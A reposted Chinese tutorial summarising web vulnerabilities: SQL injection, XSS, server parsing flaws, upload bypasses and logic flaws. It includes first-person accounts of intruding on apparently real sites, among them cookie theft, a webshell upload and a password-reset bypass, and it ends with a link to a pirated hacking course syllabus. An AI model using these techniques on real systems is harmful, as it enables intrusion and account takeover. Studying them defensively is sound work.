and 1=2&/p&&p&这样的语句在数据库查询中是可以查询成功的 , 623 and 1=1 而这里的 and 是一个逻辑判断符,623是正确存在的,而 1=1 这个也是正确的啊!所以 正确 and 正确 ,就会查询 623 这个,所以页面也就返回正常了,而 1=2 这肯定不对等,所以 正确 and 错误,就会查询错误,所以报错 。&/p&&p&既然存在注入了,懒的手工就直接扔 sqlmap 了。&/p&&h2&&figure&&img src=&https://pic2.zhimg.com/v2-ec5e987d7bb6fed56297eb_b.jpg& data-rawwidth=&634& data-rawheight=&397& class=&origin_image zh-lightbox-thumb& width=&634& data-original=&https://pic2.zhimg.com/v2-ec5e987d7bb6fed56297eb_r.jpg&&&/figure&XSS 漏洞&/h2&&p&&b&原理:&/b&web 程序解析了用户的HTML代码操作。说白了,就是程序员在设计网站中输入输出的部分的时候,没有对用户输入的内容进行过滤,从而导致用户输入恶意代码时,这些代码会被 web 程序给执行了。&/p&&p&&b&Xss&/b&&b&分类:&/b&反射型,存储型,DOM型,FLASH(DOM,FLASH不常用)&/p&&p&&b&反射型xss :&/b&存在输入输出的地方,不具备转存数据库这一步,只是一个简单的输入输出。一般这类的漏洞危害比较小,因为它的传播方式需要恶意用户把他构造好的恶意 URL 发给你,你点击才会触发的,一般有安全意识的很少会中招。&/p&&p&&b&存储型xss :&/b&没有对用户输入的东西,进行过滤,就直接存储到数据库中。一般这类的漏洞是危害最大的,而且可以运用在很多方面上,只要你知识牢固,思维广阔,这个漏洞,可以玩出很多花样来,不过该漏洞,目前运用最广的就是在网站留言板这一类的,输入恶意代码,让网站管理员查看后,并中招,从而窃取 cookie 。&/p&&p&&b&反射型实例 :&/b&&/p&&p&反射型(查看url)大白话总结:吃什么吐什么&/p&&figure&&img src=&https://pic4.zhimg.com/v2-faf5b56e92dc3df15ad6d8b0dadb5bd6_b.jpg& data-rawwidth=&728& data-rawheight=&476& class=&origin_image zh-lightbox-thumb& width=&728& data-original=&https://pic4.zhimg.com/v2-faf5b56e92dc3df15ad6d8b0dadb5bd6_r.jpg&&&/figure&&p&发现php?S=24
(下面的输出内容为1,测试下)&/p&&p&&figure&&img src=&https://pic2.zhimg.com/v2-703a01c6adfb50e6eb6dfb1_b.jpg& data-rawwidth=&517& data-rawheight=&275& class=&origin_image zh-lightbox-thumb& width=&517& data-original=&https://pic2.zhimg.com/v2-703a01c6adfb50e6eb6dfb1_r.jpg&&&/figure& 发现把s的内容替换之后 页面的内容也随之替换,则此处应该存在xss反射漏洞。&/p&&p&那我们构造下一个常用的 javascript 的弹窗代码,再看下效果 。&/p&&br&&figure&&img src=&https://pic1.zhimg.com/v2-e8d2cdfacc1ca38edb22b287771ebc9b_b.jpg& data-rawwidth=&574& data-rawheight=&52& class=&origin_image zh-lightbox-thumb& width=&574& data-original=&https://pic1.zhimg.com/v2-e8d2cdfacc1ca38edb22b287771ebc9b_r.jpg&&&/figure&&p&回车一下 。 &br&&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-113e5af79f74ef59befe27_b.jpg& data-rawwidth=&299& data-rawheight=&175& class=&content_image& width=&299&&&/figure&通过测试,我们发现这是一个典型的反射型 XSS 漏洞。&/p&&p&&b&储存型XSS实例:&/b&&/p&&p&这是一个存在储存型 XSS 漏洞钓鱼网站 。&/p&&p&&figure&&img src=&https://pic4.zhimg.com/v2-810f7cf4989bab9a73e6af_b.jpg& data-rawwidth=&383& data-rawheight=&174& class=&content_image& width=&383&&&/figure&然后,我们鼠标右键简单的查看下网页源代码 。&/p&&figure&&img src=&https://pic2.zhimg.com/v2-a5ecde361fdd26272aeb2b8730ebf8fb_b.jpg& data-rawwidth=&838& data-rawheight=&187& class=&origin_image zh-lightbox-thumb& width=&838& data-original=&https://pic2.zhimg.com/v2-a5ecde361fdd26272aeb2b8730ebf8fb_r.jpg&&&/figure&&p&在查看源代码时,我们发现 当领取码不等于98的时候 就返回true,及领取码等于98。&/p&&p&我们随便输入领取码之后,就是弹出一个领取奖品页面,在这个页面,我们其实就可以盲打一下试试。&/p&&p&那么在开始之前,我们先随便找一个 XSS 平台,复制一段盗取 cookie 的恶意代码。&/p&&p&&figure&&img src=&https://pic2.zhimg.com/v2-d14aeef78e47f26eab63_b.jpg& data-rawwidth=&439& data-rawheight=&107& class=&origin_image zh-lightbox-thumb& width=&439& data-original=&https://pic2.zhimg.com/v2-d14aeef78e47f26eab63_r.jpg&&&/figure&&br&&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-cb1ee68a9c5e28e9b841fb_b.jpg& data-rawwidth=&886& data-rawheight=&484& class=&origin_image zh-lightbox-thumb& width=&886& data-original=&https://pic1.zhimg.com/v2-cb1ee68a9c5e28e9b841fb_r.jpg&&&/figure&Xss插入的地方大多为标题跟内容(一切可以输出文本内容的都可以插入),然后我们试着插入下。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-071c54a7c332ab4c366fd3d7d0c56610_b.jpg& data-rawwidth=&778& data-rawheight=&351& class=&origin_image zh-lightbox-thumb& width=&778& data-original=&https://pic3.zhimg.com/v2-071c54a7c332ab4c366fd3d7d0c56610_r.jpg&&&/figure&&p&插入到联系地址里面测试下能不能插入,(前面加个”&)以防万一闭合下前面的标签。&/p&&p&#(这里,我其实不推荐这样的插入,因为这个的格式,字数限制都是一些 html 这个层面的限制,建议进行抓包插 XSS 代码,这样被打到的几率更大。) &/p&&p&&figure&&img src=&https://pic2.zhimg.com/v2-8c51ed699e5ea9bf5b71_b.jpg& data-rawwidth=&639& data-rawheight=&560& class=&origin_image zh-lightbox-thumb& width=&639& data-original=&https://pic2.zhimg.com/v2-8c51ed699e5ea9bf5b71_r.jpg&&&/figure&到这里就提交成功了,那就等管理员上钩就是了。&/p&&p&&figure&&img src=&https://pic3.zhimg.com/v2-ec6ac6c58c9a37dd674f_b.jpg& data-rawwidth=&549& data-rawheight=&281& class=&origin_image zh-lightbox-thumb& width=&549& data-original=&https://pic3.zhimg.com/v2-ec6ac6c58c9a37dd674f_r.jpg&&&/figure&看来这个钓鱼网站的管理员也是个时时关注信息,认真负责的管理啊!不像某些公司的那些运维们,大半年的后台都不进,我记得我一个朋友,前段时间,发了一个说说,大概内容是 mlgbz ,两年前插的一个留言板,我今天竟然收到这个 cookie 了。。。&/p&&h2&解析漏洞:&/h2&&p&利用web中间件自身的漏洞,对畸形脚本格式进行了解析。&/p&&p&这个不多解释,程序自身研发时的问题。 &/p&&p&&b&IIS 6.0&/b&&/p&&p&常见组合:server 2003+IIS6(IE6.0)&/p&&p&1. 正常解析格式包括:asp,asa,cer&/p&&p&2.
1.xxxx.pdf&/p&&p&3. 正常解析 1.asp文件夹下的任意文件:
比如说网站目录中有一个文件夹名为1.asp ,那么这个文件夹下的任意文件,比如1.jpg,1.pdf,1.doc,1.abc
都会解析成asp脚本文件。再比如有一个链接:&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&http://www.zhutougg.com/abc.asp/1.pdf
&/code&&/pre&&/div&&p&如果该站的中间件为IIS6.0,那么这个链接就会解析成asp脚本。&/p&&p&备注:在利用上传漏洞的时候,如果不能上传asp格式文件,先尝试上传asa,cer格式,然后再尝试上传1..jpg格式文件,如果可以控制上传后的目录,就上传test.jpg图片大马到1.asp目录下。&/p&&p&&b&IIS 7.5&/b&&/p&&p&常见组合:server 2008+IIS7/IIS7.5&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&1. 如果目标能解析PHP脚本,则可以尝试上传1.jpg,然后访问 http://www.test.com/1.jpg/1.php 或者 http://www.test.com/1.jpg%00.php
APACHE 2.2.*
&/code&&/pre&&/div&&p&常见漏洞版本为2.0.*到2.2.*&/p&&p&&b&apache 文件解析方式:&/b& 文件名由右往左解析。即 1.jpg.pdf  apache 会先识别 pdf格式,然后再识别 jpg 格式,因为 apache 能够识别 pdf 格式,所以这里它不会解析 .jpg 格式。再比如 1.jpg.abc
apache 先识别 .abc 格式,再识别 .jpg 格式,这里 apache 不认识 .abc 格式,所以这里 apache 将其解析成 .jpg 格式 。&/p&&p&利用:上传1.php.abc
1.jpg.abc.php.123.rar(?)&/p&&p&&b&NGINX
0.5.* | 0.6.* | 0.7-0.7.65 | 0.8-0.8.37&/b&&/p&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&如果目标能解析PHP脚本,则可以尝试上传1.jpg,然后访问 http://www.test.com/1.jpg/1.php 或者 http://www.test.com/1.jpg%00.php
&/code&&/pre&&/div&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&备注:在碰到 nginx 中间件时候,先找到网站的图片链接比如 http://blog.zhutougg.com/content/images/-2.png ,然后直接在链接后面加上 %00.php
&/code&&/pre&&/div&&p&&b&其它常见的中间件:&/b&&/p&&p&&b&asp , aspx: &/b&iis5.0 , iis6.0 , iis7.0 , iis7.0 , iis8.0&/p&&p&&b&php:&/b&
apache , nginx , fast-cgi&/p&&p&&b&jsp:&/b&
tomcat , weblogic , jboss , jetty , GlassFish , Resin , IBM Websphere&/p&&p&&b&aspx的兄弟格式:&/b& ashx&/p&&p&&b&jsp:&/b&
jspx&/p&&h2&实例:asp解析漏洞&/h2&&div class=&highlight&&&pre&&code class=&language-text&&&span&&/span&进入网站之后随手测试下注入点(http://xxx/detail_industry_news.asp?id=6)
&/code&&/pre&&/div&&p&手工测试之后发现存在sql注入 ,然后就扔注入工具里 。&/p&&p&&figure&&img src=&https://pic4.zhimg.com/v2-6d884edccb9d9055dfd21_b.jpg& data-rawwidth=&494& data-rawheight=&387& class=&origin_image zh-lightbox-thumb& width=&494& data-original=&https://pic4.zhimg.com/v2-6d884edccb9d9055dfd21_r.jpg&&&/figure&但是没有注入出来表单,后来又换了多个注入工具进行注入,结果一样,都没有表单数据 。&/p&&p&然后使用目录扫描器进行扫描,发现有一个webdata二级目录,自己猜测会不会是数据库文件了?&/p&&p&然后,继续扫描二级目录发现 webdata/webdata.mdb 这个数据库文件,下载之后发现账号,密码。&/p&&p&&figure&&img src=&https://pic3.zhimg.com/v2-fdb08da60bbc_b.jpg& data-rawwidth=&471& data-rawheight=&99& class=&origin_image zh-lightbox-thumb& width=&471& data-original=&https://pic3.zhimg.com/v2-fdb08da60bbc_r.jpg&&&/figure&既然,账号密码都有了,那就找后台吧 。&/p&&p&目录扫描器,扫后台没找见
那好吧,手工慢慢找 。。。&/p&&p&最后在一个旁站的 robots.txt 文件里,发现一个特点,就是它这个旁站的后台是域名格式的后台,那主站是不是也是这个了?搞!&br&&/p&&p&没想到还真是
xx.xx/xx.xx
这样后台 。。。&/p&&p&那就进后台 。&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-fc4ec635f82fd43b3eea_b.jpg& data-rawwidth=&540& data-rawheight=&391& class=&origin_image zh-lightbox-thumb& width=&540& data-original=&https://pic1.zhimg.com/v2-fc4ec635f82fd43b3eea_r.jpg&&&/figure&一股浓浓的南方站的味道,就像吃老干妈的感觉一样,那就先找数据库功能吧 。&/p&&p&额,没有数据库备份这个功能,看来数据库备份拿 shell 这个方法是不行了。。。&/p&&p&不过这个站是 IIS6.0 的,存在解析漏洞,还好日 ,那就找上传点吧 。&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-36cfc187fcf5cdda184fffd8_b.jpg& data-rawwidth=&555& data-rawheight=&417& class=&origin_image zh-lightbox-thumb& width=&555& data-original=&https://pic1.zhimg.com/v2-36cfc187fcf5cdda184fffd8_r.jpg&&&/figure&找到一个上传点,先传个正常图片看看,看这个上传点是不是坏的,还有会不会出来路径 。&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-de0f9cabf41ded_b.jpg& data-rawwidth=&288& data-rawheight=&156& class=&content_image& width=&288&&&/figure&既然不是坏的,那就上传个 asp DAMA 吧 。&/p&&p&&figure&&img src=&https://pic4.zhimg.com/v2-3e734ce0e9_b.jpg& data-rawwidth=&401& data-rawheight=&197& class=&content_image& width=&401&&&/figure&看来不能直接上传,那好吧,抓包上传吧 。&/p&&p&由于,我们事先知道了上传路径
,所以我们直接利用 IIS 6.0 的解析漏洞,也就是 &br&&/p&&p&(1..xx){xx是上传文件的名字}
在文件夹后面加上 1. 试试可以上传成功并解析吗。&/p&&p&抓包 ,改包 ,来先看看 。&/p&&p&&figure&&img src=&https://pic4.zhimg.com/v2-9cc0b79e49e6ce951ea3_b.jpg& data-rawwidth=&560& data-rawheight=&176& class=&origin_image zh-lightbox-thumb& width=&560& data-original=&https://pic4.zhimg.com/v2-9cc0b79e49e6ce951ea3_r.jpg&&&/figure&来,看看我们能不能连上这个 DAMA 。&/p&&p&&figure&&img src=&https://pic3.zhimg.com/v2-4198fec1ba_b.jpg& data-rawwidth=&1711& data-rawheight=&367& class=&origin_image zh-lightbox-thumb& width=&1711& data-original=&https://pic3.zhimg.com/v2-4198fec1ba_r.jpg&&&/figure&结果很不赖,被解析了,从而,也就拿下这个站了。&/p&&h2&上传漏洞加绕过方法&/h2&&p&&b&客户端检测 :&/b&&/p&&p&程序员一般使用 JavaScript 来拒绝非法文件上传。&/p&&p&&b&绕过方法:&/b&&/p&&p&FireBug插件:将用于检验文件扩展名的onsubmit事件删除。&/p&&p&中间人攻击:使用Burp Suite。首先把木马扩展名改为一张正常图片的扩展名,比如JPG扩展名,在上传时使用Burp Suite拦截上传数据,再将其中的扩展名JPG修改为PHP,就可以绕过客户端验证。(可能还需要相应地修改Content-Length)&/p&&p&任何客户端验证都是不安全的。客户端验证是防止用户输入错误,减少服务器开销,而服务器端验证才可以真正防御攻击者。&/p&&p&&b&服务器端检测&/b&&/p&&p&&b&白名单与黑名单验证&/b&&/p&&p&黑名单过滤方法:定义不允许上传的文件扩展名&/p&&p&黑名单的绕过方法:&/p&&p&1.攻击者可以从黑名单中找到Web开发人员忽略的扩展名,如:cer&/p&&p&2.对文件的后缀名进行大小写转换,比如黑名单中有php,可以将文件的后缀改为pHp,仅限windows平台 &/p&&p&3.在windows系统下,如果文件名以“.”或者空格作为结尾,系统会自动删除“.”与空格,利用此特性也可以绕过黑名单验证。(asp.或asp_)&/p&&p&白名单过滤方法:定义允许上传的文件扩展名&/p&&p&白名单的绕过方法:结合Web容器的解析漏洞&/p&&p&&b&MIME验证&/b&&/p&&p&php 中通过 $_FILE['file']['type'] 来检验&/p&&p&绕过方法:可以在Burp Suite中更改Content-Type的内容为image/jpeg&/p&&p&&b&目录验证&/b& &/p&&p&在文件上传时,程序通常允许用户将文件放到指定的目录中,如果指定的目录存在,就将文件写入目录中,不存在的话则先建立目录,然后写入。&/p&&p&比如:在前端的HTML代码中,有一个隐藏标签&input type=&hidden& name=&Extension& value=&up&/&&/p&&p&在服务器端有如下代码:&/p&&p&if(!is_dir($Extension)){ //如果文件夹不存在,就建立文件夹&br&mkdir($Extension);&br&}&/p&&p&攻击者可以利用工具将表单中value的值由“up”改为“pentest.asp”,并上传一句话图片木马文件。&/p&&p&程序在接收到文件后,对目录判断,如果服务器不存在pentest.asp目录,将会建立此目录,然后再将图片一句话密码文件写入pentest.asp目录,如果Web容器为IIS 6.0,那么网页木马会被解析。&/p&&p&&b&00截断上传&/b&&/p&&p&在ASP程序中最常见,也就是%00将后面的字符都截断了,比如上传文件名为1.asp%00xxser.jpg。&/p&&p&实际操作过程中,利用Burp Suite的Repeater中的HEX选项卡可以进行这样的操作。&/p&&p&截断上传漏洞不仅出现在ASP程序上,在&a href=&https://link.zhihu.com/?target=http%3A//lib.csdn.net/base/php& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&PHP&/a&、JSP程序中也存在这样的问题。&/p&&p&0x00不是针对所有基于白名单的后缀名检查都能绕过,代码的实现过程中必须存在截断上传漏洞。&/p&&h2&逻辑漏洞分类&br&&/h2&&p&&b&欺骗密码找回功能(任意密码重置等)&/b&&/p&&p&程序根据一个验证码来确定是用户本人,攻击者可以通过抓包改包,暴力破解,等方法来进行绕过。(漏洞产生的原因:前端验证,数据包中含CODE等)&/p&&p&思路:fuzz模糊测试来进行漏洞挖掘&/p&&p&实例:某学院存在任意密码重置漏洞&/p&&p&第一步(先找回密码)& 查看源代码&/p&&figure&&img src=&https://pic2.zhimg.com/v2-c991a53ec477ea93e0f993_b.jpg& data-rawwidth=&554& data-rawheight=&256& class=&origin_image zh-lightbox-thumb& width=&554& data-original=&https://pic2.zhimg.com/v2-c991a53ec477ea93e0f993_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-502a420ed44b5dc9ea76d2eb73dadd65_b.jpg& data-rawwidth=&854& data-rawheight=&68& class=&origin_image zh-lightbox-thumb& width=&854& data-original=&https://pic2.zhimg.com/v2-502a420ed44b5dc9ea76d2eb73dadd65_r.jpg&&&/figure&&p&跟一下 nextDo2&/p&&p&&figure&&img src=&https://pic3.zhimg.com/v2-fcdfa738ceb_b.jpg& data-rawwidth=&772& data-rawheight=&461& class=&origin_image zh-lightbox-thumb& width=&772& data-original=&https://pic3.zhimg.com/v2-fcdfa738ceb_r.jpg&&&/figure&&/p&&p&关键在跳转第二步&/p&&p&如果data.status 等于0 那么跳转第二步,如果不等于0 那么就提示验证码不正确!&/p&&p&只要 status 等于0 它就跳转第二步,那么通过burp去修改它的 Response &/p&&figure&&img src=&https://pic2.zhimg.com/v2-fee8e8ae5c_b.jpg& data-rawwidth=&495& data-rawheight=&455& class=&origin_image zh-lightbox-thumb& width=&495& data-original=&https://pic2.zhimg.com/v2-fee8e8ae5c_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-136d70d0f974debd0e6a7b_b.jpg& data-rawwidth=&711& data-rawheight=&264& class=&origin_image zh-lightbox-thumb& width=&711& data-original=&https://pic4.zhimg.com/v2-136d70d0f974debd0e6a7b_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-467ffdbc5f7_b.jpg& data-rawwidth=&803& data-rawheight=&328& class=&origin_image zh-lightbox-thumb& width=&803& data-original=&https://pic3.zhimg.com/v2-467ffdbc5f7_r.jpg&&&/figure&&br&&p&放包之后就会发现直接绕过验证改密,这样就形成了任意密码重置漏洞。&/p&&p&预防思路:response数据内不包含验证码,验证方式主要采取后端验证。&/p&&p&&b&任意金额修改 &/b&&/p&&p&可以通过篡改数据报,使得购买的商品价格为负数等(金额数据通过明文传输,没有后端验证等一系列都可以产生任意金额修改漏洞)&/p&&p&实例:&/p&&p&注册下单,支付,选择拉卡拉支付&/p&&figure&&img src=&https://pic1.zhimg.com/v2-28bd4fa1cf55621eaf05376_b.jpg& data-rawwidth=&559& data-rawheight=&433& class=&origin_image zh-lightbox-thumb& width=&559& data-original=&https://pic1.zhimg.com/v2-28bd4fa1cf55621eaf05376_r.jpg&&&/figure&&p&截断 http 请求,更改post金额数据 。&/p&&p&&figure&&img src=&https://pic2.zhimg.com/v2-f18ef27ad37bcaad125cebf_b.jpg& data-rawwidth=&932& data-rawheight=&549& class=&origin_image zh-lightbox-thumb& width=&932& data-original=&https://pic2.zhimg.com/v2-f18ef27ad37bcaad125cebf_r.jpg&&&/figure&到达支付页面发现 ,&br&&/p&&p&发现金额被修改,也未提示该修改无效 。&br&&/p&&p&预防方法:后端验证,数据包加密后进行传输 。&/p&&p&&b&越权漏洞&/b&&/p&&p&主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定(仅限于存在漏洞功能对应的数据)&/p&&p&思路:&/p&&p&可能出现越权漏洞的地方(对数据库进行操作的都可以)。&/p&&p&&figure&&img src=&https://pic1.zhimg.com/v2-5f1e73ad4ba957ffc6aec4_b.jpg& data-rawwidth=&707& data-rawheight=&780& class=&origin_image zh-lightbox-thumb& width=&707& data-original=&https://pic1.zhimg.com/v2-5f1e73ad4ba957ffc6aec4_r.jpg&&&/figure&查看代码 当id=数组里面的数为则显示账号密码,否则输出信息出错。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-21f6e38b7f69dc4f5faeff95_b.jpg& data-rawwidth=&587& data-rawheight=&215& class=&origin_image zh-lightbox-thumb& width=&587& data-original=&https://pic1.zhimg.com/v2-21f6e38b7f69dc4f5faeff95_r.jpg&&&/figure&&p&当知道管理员的id的时候可以任意更改url查询到账号密码。&/p&&p&当然越权漏洞存在很多种cookie绕过等等。&/p&&p&&b&好了,完结! &/b&&/p&&p&文章大小 1M 多的文章,被我贴的好辛苦啊,而且页面还一卡一卡的,最后再安抚一波 ,&/p&&p&226safe Team 团队官方群:2399210 。&/p&
作者: 哈哈 226safe Team 最菜的那位!反正我问他杂写的,他就是这么说的。由于团队在知乎没专栏,我就只能转贴到我的笔记上来了,分享给大家,常见的漏洞汇总吧,很不错。(*^__^*) 嘻嘻……------------------------------------------------------------…
爱安全价值1800渗透培训教程(全套无密)&br&&br&下载地址:&a href=&http://link.zhihu.com/?target=http%3A//pan.baidu.com/s/1eS4uItk& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&http://&/span&&span class=&visible&&pan.baidu.com/s/1eS4uIt&/span&&span class=&invisible&&k&/span&&span class=&ellipsis&&&/span&&/a&&p&&br&黑/白盒渗透测试:&br&安全工具篇
01_初识Nmap&br&Nmap
02_Nmap 主机发现扫描技术&br&Nmap
03_Nmap 扫描目标详解&br&Nmap
04_Nmap 端口扫描技术&br&Nmap
05_Nmap 扫描结果详解&br&Nmap
06_Nmap 服务及版本探测扫描技术&br&Nmap
07_Nmap 操作系统探测扫描技术&br&Nmap
08_Nmap 脚本扫描技术&br&Nmap
09_Nmap 绕过、欺骗防火墙/IDS&br&Nmap
10_Nmap 其他选项详解&br&Nmap
11_Nmap GUI(Zenmap)使用&br&Nmap
12_Amap、Zmap使用&br&AWVS
01_AWVS简介及安装&br&AWVS
02_Site Crawler 站点爬虫&br&AWVS
03_Subdomain Scan 子域扫描&br&AWVS
04_Http Tools 攻击工具&br&AWVS
05_盲注工具、Auth测试器、结果比较器&br&AWVS
06_Web service扫描、Web service Editor&br&AWVS
07_AWVS 配置信息&br&AWVS
08_AcuSensor 灰盒测试扫描&br&BurpSuite
01_初识burpsuite(java环境配置,浏览器代理配置)&br&BurpSuite
02_burpsuite各模块介绍。&br&BurpSuite
03_burpsuite --&比较模块comparer的使用。&br&BurpSuite
04_burpsuite --&常见编码介绍以及decoder的使用。&br&BurpSuite
05_burpsuite --&爬行模块spider的使用。&br&BurpSuite
06_burpsuite --&扫描模块scanner的使用。&br&BurpSuite
07_burpsuite --&从proxy模块拦截抓包到repeater重放。&br&BurpSuite
08_利用burpsuite-intruder进行密码爆破。&br&BurpSuite
09_利用burpsuite进行上传截断。&br&BurpSuite
10_使用burpsuite结合sqlmap进行注入。&br&APPScan
01_APPScan简介及安装&br&APPScan
02_APPScan扫描实战&br&APPScan
03_APPScan扫描结果详解&br&APPScan
04_APPScan漏洞测试实战&br&APPScan
05_APPScan自定义配置&br&APPScan
06_APPScan暴力破解等工具(PowerTools)实战&br&APPScan
07_APPScan Glassbox灰盒测试扫描&br&APPScan
08_APPScan任务及报告功能&br&漏洞原理篇
SQL注入工具篇
01_sqlmap安装以及简介&br&SQL注入工具篇
02_sqlmap使用初体验&br&SQL注入原理篇
01_什么是sql注入&br&SQL注入原理篇
02_sql注入的分类(2课)&br&SQL注入原理篇
03_怎么判断是否存在sql注入(2课)&br&SQL注入原理篇
04_一般的sql注入(2课)&br&SQL注入原理篇
05_1 布尔盲注&br&SQL注入原理篇
05_2 时间盲注&br&SQL注入原理篇
06_报错注入(3课)&br&SQL注入原理篇
07_非常规的注入点简介(2课)&br&命令执行
01_普通的命令执行&br&命令执行
02_Struts2命令执行分析&br&命令执行
03_im命令执行分析&br&越权漏洞
01_平行账号越权&br&越权漏洞
02_管理账号越权&br&逻辑漏洞
01_密码找回逻辑漏洞之用户凭证暴力破解&br&逻辑漏洞
02_密码找回逻辑漏洞之返回凭证&br&逻辑漏洞
03_密码找回逻辑漏洞之密码找回凭证在页面中&br&逻辑漏洞
04_密码找回逻辑漏洞之返回短信验证码&br&逻辑漏洞
05_密码找回逻辑漏洞之本地验证&br&逻辑漏洞
06_密码找回逻辑漏洞之token破解&br&逻辑漏洞
07_密码找回逻辑漏洞之用户凭证有效性&br&逻辑漏洞
08_密码找回逻辑漏洞之覆盖&br&逻辑漏洞
09_密码找回逻辑漏洞之总结&br&逻辑漏洞
10_在线支付逻辑漏洞之抓包修改金额&br&逻辑漏洞
11_在线支付逻辑漏洞之没有对购买数量进行负数限制&br&逻辑漏洞
12_在线支付逻辑漏洞之其他影响&br&逻辑漏洞
13_在线支付逻辑漏洞之总结&br&SSRF
01_什么是ssrf&br&SSRF
02_ssrf的挖掘与利用&br&SSRF
01_什么是csrf&br&SSRF
02_get型csrf&br&点击劫持
01_什么是点击劫持&br&点击劫持
02_点击劫持的利用与危害&br&CSRF
01_什么是csrf&br&CSRF
02_get型csrf&br&CSRF
03_post型csrf&br&CSRF
04_绕过token防御进行csrf攻击&br&CSRF
05_绕过referer防御进行csrf攻击&br&CSRF
06_flash csrf&br&网站提权篇
01_改包改后缀名拿shell&br&GetShell
02_00截断拿shell&br&GetShell
03_分号截断拿shell&br&GetShell
04_目录解析拿shell&br&GetShell
05_IIS07_0/07_5&08_03畸形解析拿shell&br&GetShell
06_Apache解析拿shell&br&GetShell
07_编辑器拿shell&br&GetShell
08_sql拿shell&br&GetShell
09_写入配置文件拿shell&br&社会工程学
01_初识社会工程学&br&社会工程学
02_社会工程学在渗透测试中的应用&br&社会工程学
03_通过社工劫持域名放大攻击危害&br&Server提权篇
01_星外主机提权教程&br&提权
02_低权限照样拿下服务器&br&提权
03_利用ssh端口转发通过一台linux外网服务器登陆内网&br&提权
04_利用IIS06_0漏洞系统另类提权教程&br&提权
05_星外主机的提权另一种方法教程&br&提权
06_NC提权拿下服务器&br&提权
07_启动项来提权教程&br&提权
08_虚拟主机提权详细讲解&br&提权
09_Serv-U提权实例&br&提权
10_一次意外的PHP提权&br&提权
11_mssql数据库提权实例教程一则&br&提权
12_linux提权教程&br&提权
13_ODAY系统提权工具介绍&br&提权
14_NC提权提权工具使用&br&提权
15_LCX等内网神器端口转换&br&提权
16_MYSQL数据库启动项提权&br&提权
17_mysql数据库高版本提权(54)&br&提权
18_Windows 提权中敏感目录和敏感注册表的利用&br&提权
19_ser-u提权教程(06_4版本)&br&提权
20_利用pcanywhere提权&br&提权
21_可读可写目录查找脚本篇&br&提权
22_脚本权限设置和脚本程序应用日志&br&提权
23_提权日志清除,日志恢复&br&提权
24_溢出漏洞提权&br&提权
25_lpk提权&br&提权
26_linux溢出漏洞提权(漏洞寻找,编译exp,反弹shell等)&br&提权
27_rar,cacls,type命令在提权,渗透中的妙用&br&提权
28_关于远控软件在提权中的利用&br&提权
29_提权中各类组件支持理解(ws组件,数据库组件,系统组件等)&br&提权
30_经典劫持服务器&br&提权
31_插入数据库拿shell&br&提权
32_windows2008服务器提权&br&提权
33_域控制器提权&br&提权
34_最新提权通杀之ms12-042&br&提权
-----正-在-更-新-中…---- &br&&br&&br&&br&&br&无线局域网攻防系列课程:&br&&br&-----------
-----------&br&基础准备
网络基础知识简介&br&基础准备
打造专用字典&br&基础准备
选购无线网卡并加载进虚拟机&br&-----------
-----------&br&环境初探
windows下对附近无线环境进行扫描&br&环境初探
使用airodump-ng工具扫描&br&环境初探
使用kismet工具扫描&br&-----------
-----------&br&WEP破解
aircrack-ng破解WEP加密&br&WEP破解
Gerix-wifi-cracker自动化破解WEP加密&br&WEP破解
Wifite自动化破解WEP加密&br&WEP破解
Hirte攻击进行新思路破解WEP&br&-----------
-----------&br&破解WPA
aircrack-ng破解WPA加密&br&破解WPA
自动化破解WPA加密&br&破解WPA
不指定字典破解WPA加密&br&破解WPA
hashcat进行跑包破解&br&破解WPA
创建Hash-table加速并用Cowpatty破解&br&破解WPA
windows下GPU跑包加速&br&破解WPA
PYRIT:GPU加速_Hash-table加速&br&破解WPA
PYRIT:batch-table加速_“attack_db”模块加速&br&破解WPA
使用airolib-ng创建彩虹表加速&br&-----------
-----------&br&WPS破解
reaver工具枚举pin码&br&WPS破解
Pixiewps秒破WPS_wifite穷举&br&-----------
-----------&br&进阶阶段
详解802.1x&br&企业环境
实战搭建Radius服务器并认证WIFI&br&企业环境
攻击使用dot1x的无线网络&br&-----------
-----------&br&机制突破
突破Mac address filter&br&机制突破
成功获取未广播的SSID&br&机制突破
连接无DHCP的网络&br&-----------
-----------&br&干扰通讯
创建恶意无线热点&br&干扰通讯
Authentication洪水攻击&br&干扰通讯
Dauth Flood攻击&br&干扰通讯
实现无线IPS并访问控制(类似ACL)&br&干扰通讯
限速同LAN主机/毒化同LAN主机&br&-----------
-----------&br&深入阶段
网络探测与扫描&br&内网渗透
ARP欺骗攻击--使用Arpspoof&br&内网渗透
ARP欺骗攻击--使用Ettercap&br&内网渗透
劫持回话/分析上网流量/抓包等&br&内网渗透
毒化内网使用户无法上网&br&内网渗透
Ettercap实现DNS劫持&br&内网渗透
MAC地址表泛洪攻击&br&内网渗透
DHCP地址池泛洪攻击&br&内网渗透
思科发现协议(CDP)泛洪攻击&br&内网渗透
攻击热备份路由器协议&br&-----------
-----------&br&使用安卓
RFA破解无线加密&br&使用安卓
Dsploit中间人攻击&br&使用安卓
zANTI中间人攻击&br&使用安卓
Lanmitm中间人攻击&br&-----------
-----------&br&高级阶段
wireshark抓取WEP报文并解密&br&报文处理
wireshark抓取WPA报文并解密&br&报文处理
cain解密报文&br&报文处理
合并/提取ivs 报文瘦身&br&报文处理
aircrack-ng工具包解密WEP/WPA报文&br&-----------
-----------&br&权限提升
Router/Switch等远程登陆(Telnet/SSH等)暴力破解&br&权限提升
配置文件泄露攻击&br&权限提升
WEB UI会话劫持攻击&br&权限提升
burp suite爆破无线路由器登陆密码&br&权限提升
MITM攻击破解路由器登录密码&br&权限提升
浅谈其他家用无线路由器漏洞&br&-----------
